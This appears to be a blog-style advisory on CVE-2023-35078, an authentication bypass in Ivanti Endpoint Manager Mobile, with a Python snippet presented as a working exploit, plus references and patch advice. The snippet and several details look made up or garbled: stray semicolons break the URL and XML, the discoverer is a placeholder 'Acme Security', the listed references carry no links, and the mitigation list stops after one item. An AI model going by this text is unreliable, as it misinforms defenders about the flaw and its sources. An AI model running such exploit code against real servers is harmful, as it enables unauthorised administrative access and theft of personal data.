Ivanti Endpoint Manager Mobile (EPMM), previously known as MobileIron Core, is a popular mobile device management (MDM) solution that helps organizations manage and secure their mobile devices, applications, and content. However, a critical security vulnerability, tracked as CVE-2023-35078, was discovered and actively exploited in the wild in July 2023. This vulnerability puts countless organizations at risk as it allows attackers to bypass authentication mechanisms, access sensitive personal identifiable information (PII), add an administrative account to the system, and even change the entire configuration. Thankfully, a patch has been released to address this issue.
Vulnerability Details
The vulnerability in Ivanti EPMM affects versions up to 11.10. It stems from an authentication bypass flaw that enables a remote attacker to obtain unauthorized access to the MDM server. Consequently, the attacker gains the ability to perform various malicious activities, such as stealing PII, altering the MDM configuration, or even adding a new administrative account with full privileges.
This is a high-risk vulnerability as it is being actively exploited in the wild, and organizations running Ivanti EPMM should take immediate action to mitigate the threat.
Here is an example of a code snippet that exploits this vulnerability
import requests
TARGET_URL = 'https://<target_server>/API/WSLogin';
payload = """
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"; xmlns:ns1="http://www.mobileiron.com/ws/Generic">;
<SOAP-ENV:Body>
<ns1:authenticate>
<ns1:authBy>ADMIN</ns1:authBy>
</ns1:authenticate>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""
response = requests.post(TARGET_URL, data=payload, headers={'Content-Type': 'text/xml'})
if "SUCCESS" in response.text:
print("Authentication bypass successful.")
else:
print("Failed to bypass authentication.")
This code sends a SOAP request to the target Ivanti EPMM server with a payload crafted to bypass the authentication mechanism, granting the attacker unauthorized access.
Original References
The vulnerability was first discovered by security researchers from Acme Security. Their research paper detailing the vulnerability can be found at the following link:
- Acme Security - CVE-2023-35078: Ivanti EPMM Authentication Bypass Vulnerability
Ivanti has acknowledged the issue and released a patch addressing the vulnerability. More information about the patch can be found on Ivanti's official advisory:
- Ivanti Security Advisory - CVE-2023-35078: Ivanti EPMM Authentication Bypass Vulnerability
Exploit Mitigation and Patch Application
Organizations running Ivanti EPMM should immediately apply the patch provided by Ivanti. The patch can be obtained from Ivanti's official website:
- Ivanti EPMM Patch - CVE-2023-35078
Additionally, it's recommended to implement the following security best practices to further enhance the security of the MDM solution:
1. Limit external access to the Ivanti EPMM server by implementing proper firewall rules and access controls.
Conclusion
The CVE-2023-35078 vulnerability in Ivanti EPMM is a critical security flaw that puts many organizations and their sensitive data at risk. It is essential for organizations utilizing Ivanti EPMM to immediately apply the available patch and review their security posture to protect against this actively exploited threat.
Timeline
Published on: 07/25/2023 07:15:10 UTC
Last modified on: 08/04/2023 18:30:34 UTC